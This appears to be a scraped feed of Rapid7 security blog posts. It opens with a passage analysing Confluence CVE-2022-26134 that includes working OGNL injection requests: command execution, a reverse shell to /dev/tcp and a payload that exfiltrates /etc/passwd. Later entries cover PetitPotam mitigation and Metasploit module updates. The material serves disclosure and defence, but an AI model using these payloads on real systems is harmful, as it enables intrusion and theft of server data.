/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1\n > Host: 10.0.0.28:8090\n > User-Agent: curl/7.68.0\n > Accept: */*\n > \n * Mark bundle as not supporting multiuse\n < HTTP/1.1 302 \n < Cache-Control: no-store\n < Expires: Thu, 01 Jan 1970 00:00:00 GMT\n < X-Confluence-Request-Time: 1654212503090\n < Set-Cookie: JSESSIONID=34154443DC363351DD0FE3D1EC3BEE01; Path=/; HttpOnly\n < X-XSS-Protection: 1; mode=block\n < X-Content-Type-Options: nosniff\n < X-Frame-Options: SAMEORIGIN\n < Content-Security-Policy: frame-ancestors 'self'\n < X-Cmd-Response: confluence \n < Location: /login.action?os_destination=%2F%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D%2Findex.action&permissionViolation=true\n < Content-Type: text/html;charset=UTF-8\n < Content-Length: 0\n < Date: Thu, 02 Jun 2022 23:28:23 GMT\n < \n * Connection #0 to host 10.0.0.28 left intact\n \n\nDecoding the exploit in the `curl` request shows how this is achieved. The exploit saves the output of the `exec` call and uses `setHeader` to include the result in the server\u2019s response to the attacker.\n \n \n ${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"whoami\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}\n \n\n### Root cause\n\nOur investigation led to the following partial call stack. The call stack demonstrates the OGNL injection starting from `HttpServlet.service` to `OgnlValueStack.findValue` and beyond.\n \n \n at ognl.SimpleNode.evaluateGetValueBody(SimpleNode.java:171)\n at ognl.SimpleNode.getValue(SimpleNode.java:193)\n at ognl.Ognl.getValue(Ognl.java:333)\n at ognl.Ognl.getValue(Ognl.java:310)A\n at com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141)\n at com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)\n at com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95)\n at com.opensymphony.xwork.DefaultActionInvocation.executeResult(DefaultActionInvocation.java:263)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:187)\n at com.atlassian.confluence.xwork.FlashScopeInterceptor.intercept(FlashScopeInterceptor.java:21)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.actions.LastModifiedInterceptor.intercept(LastModifiedInterceptor.java:27)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.core.ConfluenceAutowireInterceptor.intercept(ConfluenceAutowireInterceptor.java:44)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeAndHandleExceptions(TransactionalInvocation.java:61)\n at com.atlassian.xwork.interceptors.TransactionalInvocation.invokeInTransaction(TransactionalInvocation.java:51)\n at com.atlassian.xwork.interceptors.XWorkTransactionInterceptor.intercept(XWorkTransactionInterceptor.java:50)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.xwork.SetupIncompleteInterceptor.intercept(SetupIncompleteInterceptor.java:61)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.atlassian.confluence.security.interceptors.SecurityHeadersInterceptor.intercept(SecurityHeadersInterceptor.java:26)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.interceptor.AroundInterceptor.intercept(AroundInterceptor.java:35)\n at com.opensymphony.xwork.DefaultActionInvocation.invoke(DefaultActionInvocation.java:165)\n at com.opensymphony.xwork.DefaultActionProxy.execute(DefaultActionProxy.java:115)\n at com.atlassian.confluence.servlet.ConfluenceServletDispatcher.serviceAction(ConfluenceServletDispatcher.java:56)\n at com.opensymphony.webwork.dispatcher.ServletDispatcher.service(ServletDispatcher.java:199)\n at javax.servlet.http.HttpServlet.service(HttpServlet.java:764)\n \n\n`OgnlValueStack` [findValue(str)](<https://struts.apache.org/maven/struts2-core/apidocs/com/opensymphony/xwork2/ognl/OgnlValueStack.html#findValue-java.lang.String->) is important as it is the starting point for the OGNL expression to be evaluated. As we can see in the call stack above, `TextParseUtil.class` invokes `OgnlValueStack.findValue` when this vulnerability is exploited.\n \n \n public class TextParseUtil {\n public static String translateVariables(String expression, OgnlValueStack stack) {\n StringBuilder sb = new StringBuilder();\n Pattern p = Pattern.compile(\"\\\\$\\\\{([^}]*)\\\\}\");\n Matcher m = p.matcher(expression);\n int previous = 0;\n while (m.find()) {\n String str1, g = m.group(1);\n int start = m.start();\n try {\n Object o = stack.findValue(g);\n str1 = (o == null) ? \"\" : o.toString();\n } catch (Exception ignored) {\n str1 = \"\";\n } \n sb.append(expression.substring(previous, start)).append(str1);\n previous = m.end();\n } \n if (previous < expression.length())\n sb.append(expression.substring(previous)); \n return sb.toString();\n }\n }\n \n\n`ActionChainResult.class` calls `TextParseUtil.translateVariables` using `this.namespace` as the provided expression:\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\nWhere `namespace` is created from the request URI string in `com.opensymphony.webwork.dispatcher.ServletDispatcher.getNamespaceFromServletPath`:\n \n \n public static String getNamespaceFromServletPath(String servletPath) {\n servletPath = servletPath.substring(0, servletPath.lastIndexOf(\"/\"));\n return servletPath;\n }\n \n\nThe result is that the attacker-provided URI will be translated into a namespace, which will then find its way down to OGNL expression evaluation. At a high level, this is very similar to [CVE-2018-11776](<https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts2_namespace_ognl.rb>), the Apache Struts2 namespace OGNL injection vulnerability. Just a reminder that there is nothing new in this world.\n\n### The patch\n\nOn June 3, 2022, Atlassian directed customers to replace `xwork-1.0.3.6.jar` with a newly released `xwork-1.0.3-atlassian-10.jar`. The xwork jars contain the `ActionChainResult.class` and `TextParseUtil.class` we identified as the path to OGNL expression evaluation.\n\nThe patch makes a number of small changes to fix this issue. For one, `namespace` is no longer passed down to `TextParseUtil.translateVariables` from `ActionChainResult.execute`:\n\n**Before:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n OgnlValueStack stack = ActionContext.getContext().getValueStack();\n String finalNamespace = TextParseUtil.translateVariables(this.namespace, stack);\n String finalActionName = TextParseUtil.translateVariables(this.actionName, stack);\n \n\n**After:**\n \n \n public void execute(ActionInvocation invocation) throws Exception {\n if (this.namespace == null)\n this.namespace = invocation.getProxy().getNamespace(); \n String finalNamespace = this.namespace;\n String finalActionName = this.actionName;\n \n\nAtlassian also added `SafeExpressionUtil.class` to the `xworks` jar. `SafeExpressionUtil.class` provides filtering of unsafe expressions and has been inserted into `OgnlValueStack.class` in order to examine expressions when `findValue` is invoked. For example:\n \n \n public Object findValue(String expr) {\n try {\n if (expr == null)\n return null; \n if (!this.safeExpressionUtil.isSafeExpression(expr))\n return null; \n if (this.overrides != null && this.overrides.containsKey(expr))\n \n\n### Payloads\n\nThe OGNL injection primitive gives attackers many options. Volexity\u2019s excellent **[Zero-Day Exploitation of Atlassian Confluence](<https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/>)** discusses JSP webshells being dropped to disk. However, Confluence Server should typically execute as `confluence` and not `root`. The `confluence` user is fairly restricted and unable to introduce web shells (to our knowledge).\n\nJava does otherwise provide a wide variety of features that aid in achieving and maintaining execution (both with and without touching disk). It\u2019s impossible to demonstrate all here, but a reverse shell routed through Java\u2019s [Nashorn](<https://docs.oracle.com/javase/10/nashorn/introduction.htm#JSNUG136>) engine is, perhaps, an interesting place for others to explore.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/\n \n\nDecoded, the exploit looks like the following:\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/10.0.0.28/1270 0>&1').start()\")}\n \n\nAnd results in a reverse shell:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37148\n bash: cannot set terminal process group (34470): Inappropriate ioctl for device\n bash: no job control in this shell\n bash: /root/.bashrc: Permission denied\n confluence@ubuntu:/opt/atlassian/confluence/bin$ id\n id\n uid=1001(confluence) gid=1002(confluence) groups=1002(confluence)\n confluence@ubuntu:/opt/atlassian/confluence/bin$\n \n\nOf course, shelling out can be highly risky for attackers if the victim is running some type of threat detection software. Executing in memory only is least likely to get an attacker caught. As an example, we put together a simple exploit that will read `/etc/passwd` and exfiltrate it to the attacker without shelling out.\n \n \n curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22var%20data%20%3D%20new%20java.lang.String%28java.nio.file.Files.readAllBytes%28java.nio.file.Paths.get%28%27/etc/passwd%27%29%29%29%3Bvar%20sock%20%3D%20new%20java.net.Socket%28%2710.0.0.28%27%2C%201270%29%3B%20var%20output%20%3D%20new%20java.io.BufferedWriter%28new%20java.io.OutputStreamWriter%28sock.getOutputStream%28%29%29%29%3B%20output.write%28data%29%3B%20output.flush%28%29%3B%20sock.close%28%29%3B%22%29%7D/\n \n\nWhen decoded, the reader can see that we again have relied on the Nashorn scripting engine.\n \n \n ${new javax.script.ScriptEngineManager().getEngineByName(\"nashorn\").eval(\"var data = new java.lang.String(java.nio.file.Files.readAllBytes(java.nio.file.Paths.get('/etc/passwd')));var sock = new java.net.Socket('10.0.0.28', 1270); var output = new java.io.BufferedWriter(new java.io.OutputStreamWriter(sock.getOutputStream())); output.write(data); output.flush(); sock.close();\")}\n \n\nAgain, the attacker is listening for the exfiltration which looks, as you\u2019d expect, like `/etc/passd`:\n \n \n albinolobster@ubuntu:~$ nc -lvnp 1270\n Listening on 0.0.0.0 1270\n Connection received on 10.0.0.28 37162\n root:x:0:0:root:/root:/bin/bash\n daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n bin:x:2:2:bin:/bin:/usr/sbin/nologin\n sys:x:3:3:sys:/dev:/usr/sbin/nologin\n sync:x:4:65534:sync:/bin:/bin/sync\n games:x:5:60:games:/usr/games:/usr/sbin/nologin\n man:x:6:12:man:/var/cache/man:/usr/sbin/nologin\n lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\n mail:x:8:8:mail:/var/mail:/usr/sbin/nologin\n \u2026 truncated \u2026\n \n\nFinally, note that the exploit could be entirely URI-encoded as well. Writing any type of detection logic that relies on **just** the ASCII form will be quickly bypassed.\n\n## Mitigation guidance\n\nAtlassian released patches for CVE-2022-26134 on June 3, 2022. A full list of fixed versions is available in the [advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). A temporary workaround for CVE-2022-26134 is also available\u2014note that the workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\nOrganizations should install patches OR apply the workaround on an **emergency basis**. If you are unable to mitigate the vulnerability for any version of Confluence, you should restrict or disable Confluence Server and Confluence Data Center instances immediately. We recommend that all organizations consider implementing IP address safelisting rules to restrict access to Confluence.\n\nIf you are unable to apply safelist IP rules to your Confluence server, consider adding WAF protection. Based on the details published so far, we recommend adding Java deserialization rules that defend against RCE injection vulnerabilities, such as CVE-2021-26084. For example, see the `JavaDeserializationRCE_BODY`, `JavaDeserializationRCE_URI`, `JavaDeserializationRCE_QUERYSTRING`, and `JavaDeserializationRCE_HEADER` rules described [here](<https://docs.aws.amazon.com/waf/latest/developerguide/aws-managed-rule-groups-baseline.html#aws-managed-rule-groups-baseline-known-bad-inputs>).\n\n## Rapid7 customers\n\n**InsightVM and Nexpose:** Customers can assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks as of June 3, 2022:\n\n * A remote check (atlassian-confluence-cve-2022-26134-remote) available in the 3:30 PM EDT content-only release on June 3\n * A remote _version_ check (atlassian-confluence-cve-2022-26134) available in the 9 PM EDT content-only release on June 3\n\n**InsightIDR:** Customers should look for alerts generated by InsightIDR's built-in detection rules from systems monitored by the Insight Agent. Alerts generated by the following rules may be indicative of related malicious activity:\n\n * Confluence Java App Launching Processes\n\nThe Rapid7 MDR (Managed Detection &amp; Response) SOC is monitoring for this activity and will escalate confirmed malicious activity to managed customers immediately.\n\n**tCell:** Customers leveraging the Java App Server Agent can protect themselves from exploitation by using the OS Commands block capability. For customers leveraging a Web Server Agent, we recommend creating a block rule for any url path starting with `${` or `%24%7B`.\n\n## Updates\n\n**June 3, 2022 11:20 AM EDT:** This blog has been updated to reflect that all supported versions of Confluence Server and Confluence Data Center are affected, and it's likely that **all versions** (including LTS and unsupported) are affected, but Atlassian has not yet determined the earliest vulnerable version.\n\n**June 3, 2022 11:45 AM EDT:** Atlassian has released a temporary workaround for CVE-2022-26134. The workaround must be manually applied. Detailed instructions are [available in Atlassian's advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) for applying the workaround to Confluence Server and Data Center 7.15.0-7.18.0 and 7.0.0-7.14.2.\n\n**June 3, 2022 1:15 PM EDT:** Atlassian has released patches for CVE-2022-26134. A full list of fixed versions is [available in their advisory](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>). Rapid7 recommends applying patches OR the temporary workaround (manual) on an **emergency basis.**\n\n**June 3, 2022 3:15 PM EDT:** A full technical analysis of CVE-2022-26134 has been added to this blog to aid security practitioners in understanding and prioritizing this vulnerability. A vulnerability check for InsightVM and Nexpose customers is in active development with a release targeted for this afternoon.\n\n**June 3, 2022 3:30 PM EDT:** InsightVM and Nexpose customers can assess their exposure to CVE-2022-26134 with a remote vulnerability check in today's (June 3, 2022) content release.\n\n**June 6, 2022 10 AM EDT:** A second content release went out the evening of Friday, June 3 containing a remote version check for CVE-2022-26134. This means InsightVM and Nexpose customers are able to assess their exposure to CVE-2022-26134 with two unauthenticated vulnerability checks.\n\nAttacker activity targeting on-premise instances of Confluence Server and Confluence Data Center has continued to increase. Organizations that have not yet applied the patch or the workaround should **assume compromise** and activate incident response protocols in addition to remediating CVE-2022-26134 on an emergency basis.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T23:27:15", "type": "rapid7blog", "title": "Active Exploitation of Confluence CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11776", "CVE-2021-26084", "CVE-2022-26134", "CVE-2022-26314"], "modified": "2022-06-02T23:27:15", "id": "RAPID7BLOG:396ACAA896DDC62391C1F6CBEDA04085", "href": "https://blog.rapid7.com/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-08-11T19:20:09", "description": "\n\n \n_The PetitPotam attack vector was assigned CVE-2021-36942 and patched on August 10, 2021. _S_ee the `Updates` section at the end of this post for more information._\n\nLate last month (July 2021), security researcher [Topotam](<https://github.com/topotam>) published a [proof-of-concept (PoC) implementation](<https://github.com/topotam/PetitPotam>) of a novel NTLM relay attack christened \u201cPetitPotam.\u201d The technique used in the PoC allows a remote, **unauthenticated** attacker to completely take over a Windows domain with the Active Directory Certificate Service (AD CS) running \u2014 including domain controllers. Rapid7 researchers have tested public proof-of-concept code against a Windows domain controller setup and confirmed exploitability. One of our [senior researchers](<https://twitter.com/wvuuuuuuuuuuuuu>) summed it up with: \"This attack is too easy.\" \n\nPetitPotam works by abusing Microsoft\u2019s Encrypting File System Remote Protocol (MS-EFSRPC) to trick one Windows host into authenticating to another over LSARPC on TCP port 445. Successful exploitation means that the target server will perform NTLM authentication to an arbitrary server, allowing an attacker who is able to leverage the technique to do... pretty much anything they want with a Windows domain (e.g., deploy ransomware, create nefarious new group policies, and so on). The folks over at SANS ISC have a great write-up [here](<https://isc.sans.edu/diary/Active+Directory+Certificate+Services+%28ADCS+-+PKI%29+domain+admin+vulnerability/27668>).\n\nAccording to Microsoft\u2019s [ADV210003 advisory](<https://msrc.microsoft.com/update-guide/vulnerability/ADV210003>), Windows users are potentially vulnerable to this attack if they are using Active Directory Certificate Services (AD CS) with any of the following services:\n\n * Certificate Authority Web Enrollment\n * Certificate Enrollment Web Service\n\nNTLM relay attacks aren\u2019t new\u2014they\u2019ve [been around for decades](<https://owasp.org/www-pdf-archive/NTLM_Relay_Attacks.pdf>). However, a few things make PetitPotam and its [variants](<https://github.com/bats3c/ADCSPwn>) of higher interest than your more run-of-the-mill NTLM relay attack. As noted above, remote attackers don\u2019t need credentials to make this thing work, but more importantly, there\u2019s no user interaction required to coerce a target domain controller to authenticate to a threat actor\u2019s server. Not only is this easier to do \u2014 it\u2019s faster (though admittedly, well-known tools like Mimikatz are also extremely effective for gathering domain administrator-level service accounts). PetitPotam is the latest attack vector to underscore the fundamental fragility of the Active Directory privilege model. \n\nMicrosoft released [an advisory](<https://msrc.microsoft.com/update-guide/vulnerability/ADV210003>) with a series of updates in response to community concern about the attack \u2014 which, as they point out, is \u201ca classic NTLM relay attack\u201d that abuses intended functionality. Users concerned about the PetitPotam attack should review Microsoft\u2019s guidance on mitigating NTLM relay attacks against Active Directory Certificate Services in [KB500413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>). Since it looks like Microsoft [will not issue an official fix](<https://twitter.com/msftsecresponse/status/1419025196044865539>) for this vector, community researchers have added PetitPotam to [a running list](<https://github.com/cfalta/MicrosoftWontFixList/blob/main/README.md>) of \u201cwon\u2019t fix\u201d exploitable conditions in Microsoft products.\n\nThe PetitPotam PoC is already popular with red teams and community researchers. We expect that interest to increase as Black Hat brings further scrutiny to [Active Directory Certificate Services attack surface area](<https://posts.specterops.io/certified-pre-owned-d95910965cd2>). \n\n## Mitigation Guidance\n\nA patch that mitigates this attack chain is available as of August 10, 2021. Windows administrators should apply the August 10, 2021 patch for CVE-2021-36942 as soon as possible, prioritizing domain controllers, and then follow the guidance below as specified in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>).\n\nIn general, to prevent NTLM relay attacks on networks with NTLM enabled, domain administrators should ensure that services that permit NTLM authentication make use of protections such as [Extended Protection for Authentication](<https://docs.microsoft.com/en-us/security-updates/securityadvisories/2009/973811>) (EPA) coupled with \u201c[Require SSL](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>)\u201d for affected virtual sites, or signing features such as SMB signing. Implementing \u201cRequire SSL\u201d is a critical step: Without it, EPA is ineffective.\n\nAs an NTLM relay attack, PetitPotam takes advantage of servers on which Active Directory Certificate Services (AD CS) is not configured with the protections mentioned above. Microsoft\u2019s [KB5005413: Mitigating NTLM Relay Attacks on Active Directory Certificate Services (AD CS)](<https://support.microsoft.com/help/5005413>) emphasizes that the primary mitigation for PetitPotam consists of three configuration changes (and an IIS restart). In addition to primary mitigations, Microsoft also recommends disabling NTLM authentication where possible, starting with domain controllers. \n\nIn this order, [KB5005413](<https://support.microsoft.com/help/5005413>) recommends:\n\n * Disabling NTLM Authentication on Windows domain controllers. Documentation on doing this can be found [here](<https://docs.microsoft.com/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-ntlm-authentication-in-this-domain>).\n * Disabling NTLM on any AD CS Servers in your domain using the group policy [Network security: Restrict NTLM: Incoming NTLM traffic](<https://docs.microsoft.com/windows/security/threat-protection/security-policy-settings/network-security-restrict-ntlm-incoming-ntlm-traffic>). For step-by-step directions, see [KB5005413](<https://support.microsoft.com/help/5005413>).\n * Disabling NTLM for Internet Information Services (IIS) on AD CS Servers in your domain running the \"Certificate Authority Web Enrollment\" or \"Certificate Enrollment Web Service\" services.\n\nWhile not included in Microsoft\u2019s official guidance, community researchers [have tested](<https://twitter.com/gentilkiwi/status/1421949715986403329>) using NETSH RPC filtering to block PetitPotam attacks [with apparent success](<https://twitter.com/CraigKirby/status/1422569782088388611>). Rapid7 research teams have not verified this behavior, but it may be [an option](<https://www.bleepingcomputer.com/news/microsoft/windows-petitpotam-attacks-can-be-blocked-using-new-method/>) for blocking the attack vector without negatively impacting local EFS functionality.\n\n## Rapid7 Customers\n\nInsightVM and Nexpose customers can assess their exposure to PetitPotam via the local vulnerability checks `msft-adv210003`, which looks for the registry settings described in [ADV210003](<https://msrc.microsoft.com/update-guide/vulnerability/ADV210003>), and `msft-cve-2021-36942`, which checks for the patches released by Microsoft on August 10.\n\n## Updates\n\n**August 10, 2021:** Microsoft has released a patch that addresses the PetitPotam NTLM relay attack vector in today's Patch Tuesday. Tracked as [CVE-2021-36942](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942>), the August 2021 Patch Tuesday security update blocks the affected API calls [OpenEncryptedFileRawA](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfilerawa>) and [OpenEncryptedFileRawW](<https://docs.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-openencryptedfileraww>) through the LSARPC interface. Windows administrators should prioritize patching domain controllers and will still need to take additional steps listed in [KB5005413](<https://support.microsoft.com/en-us/topic/kb5005413-mitigating-ntlm-relay-attacks-on-active-directory-certificate-services-ad-cs-3612b773-4043-4aa9-b23d-b87910cd3429>) to ensure their systems are fully mitigated. \n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {}, "published": "2021-08-03T20:13:50", "type": "rapid7blog", "title": "PetitPotam: Novel Attack Chain Can Fully Compromise Windows Domains Running AD CS", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-36942"], "modified": "2021-08-03T20:13:50", "id": "RAPID7BLOG:D9E3C0B84D67BD0A26DEAD5F6F4EAAC4", "href": "https://blog.rapid7.com/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-22T15:05:39", "description": "## We just couldn't contain ourselves!\n\n\n\nThis week we've got two Kubernetes modules coming at you from [adfoster-r7](<https://github.com/adfoster-r7>) and [smcintyre-r7](<https://github.com/smcintyre-r7>). First up is an enum module `auxiliary/cloud/kubernetes/enum_kubernetes` that'll extract a variety of information including the namespaces, pods, secrets, service token information, and the Kubernetes environment version! Next is an authenticated code execution module `exploit/multi/kubernetes/exec` (which shipped with a new websocket implementation, too, by the way) that will spin up a new pod with a Meterpreter payload for you provided you have the Kubernetes JWT token and access to the Kubernetes REST API. These modules can even be run through a compromised container that may be running on the Kubernetes cluster.\n\n## Atlassian Confluence WebWork OGNL Injection gets Windows support\n\nYou might remember [Confluence Server CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>) making an appearance in a wrap-up last month, and it's back! Rapid7\u2019s own [wvu-r7](<https://github.com/wvu-r7>) has updated his Confluence Server exploit to support Windows targets.\n\n## New module content (2)\n\n * [Kubernetes Enumeration](<https://github.com/rapid7/metasploit-framework/pull/15786>) by Spencer McIntyre and Alan Foster - This adds a module for enumerating Kubernetes environments. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. It will extract a variety of information including the namespaces, pods, secrets and version.\n * [Kubernetes authenticated code execution](<https://github.com/rapid7/metasploit-framework/pull/15733>) by Spencer McIntyre and Alan Foster - Adds a new `exploit/multi/kubernetes/exec` module. It can be run via an established session within a Kubernetes environment or with an authentication token and target information. The module creates a new pod which will execute a Meterpreter payload to open a new session, as well as mounting the host's file system when possible.\n\n## Enhancements and features\n\n * [#15732](<https://github.com/rapid7/metasploit-framework/pull/15732>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- Adds terminal size synchronisation for fully interactive shells against Linux environments with `shell -it`. This functionality is behind a feature flag and can be enabled with `features set fully_interactive_shells true`.\n * [#15769](<https://github.com/rapid7/metasploit-framework/pull/15769>) from [wvu-r7](<https://github.com/wvu-r7>) \\- Added Windows support to the Atlassian Confluence CVE-2021-26084 exploit.\n * [#15773](<https://github.com/rapid7/metasploit-framework/pull/15773>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Adds a collection of useful commands for configuring a local or remote Kubernetes environment to aid with testing and exploring Metasploit's Kubernetes modules and pivoting capabilities. The resource files include deploying two vulnerable applications, and populating secrets which can be extracted and stored as loot, as well as utility commands for creating admin and service account tokens.\n\n## Bugs fixed\n\n * [#15760](<https://github.com/rapid7/metasploit-framework/pull/15760>) from [adfoster-r7](<https://github.com/adfoster-r7>) \\- Fixes an issue when attempting to store JSON loot, where the extension was always being set to `bin` instead of `json`.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222021-10-13T09%3A47%3A12-05%3A00..2021-10-21T11%3A22%3A54-04%3A00%22>)\n * [Full diff 6.1.10...6.1.11](<https://github.com/rapid7/metasploit-framework/compare/6.1.10...6.1.11>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {}, "published": "2021-10-22T14:25:55", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T14:25:55", "id": "RAPID7BLOG:755102CA788DC2D430C6890A3E9B1040", "href": "https://blog.rapid7.com/2021/10/22/metasploit-wrap-up-135/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-12-10T23:03:49", "description": "## Word and Javascript are a rare duo.\n\n\n\nThanks to [thesunRider](<https://github.com/thesunRider>). you too can experience the wonder of this mystical duo. The sole new metasploit module this release adds a file format attack to generate a very special document. By utilizing Javascript embedded in a Word document to trigger a chain of events that slip through various Windows facilities, a session as the user who opened the document can be yours.\n\n## Do you like spiders?\n\nIt has been 3 years since SMB2 support was added to smb share enumeration and over a year ago SMB3 support was added, yet the spiders are not done spinning their webs. Thanks to [sjanusz-r7](<https://github.com/sjanusz-r7>) the spiders have evolved to take advantage of these new skills and the webs can span new doorways. Updates to `scanner/smb/smb_enumshares` improve enumeration support for the latest Windows targets that deploy with SMB3 only by default.\n\n## New module content (1)\n\n * [Microsoft Office Word Malicious MSHTML RCE](<https://github.com/rapid7/metasploit-framework/pull/15742>) by 